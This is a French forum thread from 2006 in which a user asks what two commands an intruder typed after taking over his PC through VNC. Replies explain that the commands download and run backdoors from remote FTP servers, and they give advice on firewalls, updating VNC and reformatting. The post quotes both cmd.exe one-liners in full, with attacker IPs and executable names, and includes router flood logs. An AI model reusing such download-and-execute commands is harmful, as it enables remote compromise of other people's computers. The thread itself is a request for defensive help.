Annonce

Réduire
Aucune annonce.

[h4x] petite question aux pro ^^

Réduire
X
Réduire
 
  • Page sur 1
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages
Précédent template Suivante
  • #1

    [h4x] petite question aux pro ^^

    Voila a plusieurs reprise un petit malin parvient a prendre le controle de mon pc par le biai de vnc (car j utilise DMZ (Demilitarized Zone) sur mon routeur pour le p2p ils ont un acces direct a l'ordi)

    et une fois le controle acquis il lance l'invite de commande (Windows+R) et tape une premiere fois ceci :

    Code:
    cmd.exe /c del i&echo open 81.244.184.71 16665 > i&echo user 1 1 >> i &echo get 881.exe >> i &echo quit >> i &ftp §n §s:i &881.exe&del i&exit
    et ensuite meme manip avec :

    Code:
     
cmd.exe /cmd.exe /c del ic d&eelc i&echoho open 81.243.171.87 21800 > i&echo user 1 1 >> i &echo get 334.exe >> i &echo quit >> i &ftp §n §s:i &334.exe&del i&exit
    Je ne suis pas sur mais je pense que l'ip entrée n'est pas la mienne mais pas avec certitude.

    Savez vous ce que ces lignes execute par hasard ? histoire de pas laisser de crasse dans mon pc
    iPhone 3G 16Go White -  iPhone 4 32Go Black
    Tags: Aucun(e)
  • #2
    Voici ce que mon routeur a enregistré :

    11/26/2006 19:35:54 **UDP Flood to Host** 192.168.1.103, 1118->> 64.166.105.65, 27035 (from PPPoE1 Outbound)
    11/26/2006 19:35:48 **UDP Flood to Host** 192.168.1.103, 1118->> 70.171.83.97, 27030 (from PPPoE1 Outbound)
    11/26/2006 18:27:19 **UDP Flood to Host** 192.168.1.103, 4775->> 64.166.105.65, 27040 (from PPPoE1 Outbound)
    11/26/2006 17:55:28 NTP Date/Time updated.
    11/26/2006 17:53:13 **SYN Flood to Host** 192.168.1.107, 3982->> 216.113.185.90, 80 (from PPPoE1 Outbound)
    iPhone 3G 16Go White -  iPhone 4 32Go Black

    Commentaire

    • #3
      DocSapro, coupe ton logiciel de P2P et retire l'accès direct dans ton routeur. Ensuite une bonne désinfection de ton pc et un paramétrage plus adapté du routeur / windows sera le bienvenu. Il est anormal de laisser une connexion directe depuis l'extérieur pour un logiciel P2P.

      Commentaire

      • #4
        Oui c'est ce que j'ai fait après mais en fait j'etais pas sur mon écran quand ca c'est passé je l ai vu après , vnc était utilisé :s et le cmd aussi

        Mais j'aurai voulu savoir l'effet des lignes tapés car mon AntiVirus n'a rien détecté a part le server vnc " not-a-virus "
        iPhone 3G 16Go White -  iPhone 4 32Go Black

        Commentaire

        • #5
          Coupe ton serveur vnc ! Et sécurise le par après si tu en as besoin...

          Commentaire

          • #6
            C'est fait et vive skynet et ses ips dynamiques
            iPhone 3G 16Go White -  iPhone 4 32Go Black

            Commentaire

            • #7
              Vérifie également de ne pas avoir des fichiers 334.exe et 881.exe dans tes dossiers \Windows et \Windows\system32, et supprime les si tu les trouves (quoique logiquement, c'est une commande pour les exécuter à distance)... au pire, fais une recherche...

              Ensuite, installe une version à jour de VNC (voir UltraVNC ou RealVNC qui sont plus sécurisés), c'est dû à un bug de la 4.1 apparement...
              Dernière modification par JecooL, 27 novembre 2006, 05h36.

              Commentaire

              • #8
                Il ouvre ton invite de commande DOS et va télécharger un fichier sur un server ftp distant (dont tu as les IPS, peut-être la sienne si tu as de la chance; une autre machine defaced si il prend ses précautions): 334.exe et 881.exe. Ces deux fichiers sont ensuite effacés donc tu n'en auras aucune trace sur ton hdd.

                Ces fichiers sont vraisemenblablement des backdoors, il a dès lors accès à ton hdd mais je pense plus qu'il s'agisse ici d'un worm qui lance des commandes de masse (comme dans l'exemple du log, une attaque DDOS par packets encapsulés SYN ACK).

                Tu as sans doute été infecté suite à un exploit de VNC. Le mieux à faire serait de format ton hdd, tout simplement, et de faire une MAJ du daemon pour prévenir tout risque à l'avenir

                Commentaire

                • #9
                  Merci pour toutes ces infos je vais bien me protéger lol le format ca va etre trop radical c'est pas pour tout de suite ^^
                  iPhone 3G 16Go White -  iPhone 4 32Go Black

                  Commentaire

                  • #10
                    Le simple firewall intégré de windows xp SP2 permet déjà d'éviter ce genre d'attaque. Se placer dans une DMZ sans aucun protection et en utilisant ce type de logiciel, c'est l'assurance d'obtenir de tels ennuis.

                    Avant un format radical qui n'est certainement pas nécessaire, je conseille plutôt une bonne sécurisation du pc, tu peux rester en dmz mais sécuriser ton pc avec le firewall intégré ou une solution gratuite et ou payante et performante (ZoneAlarm par exemple)

                    Commentaire

                    Précédent template Suivante
                    Chargement...
                    X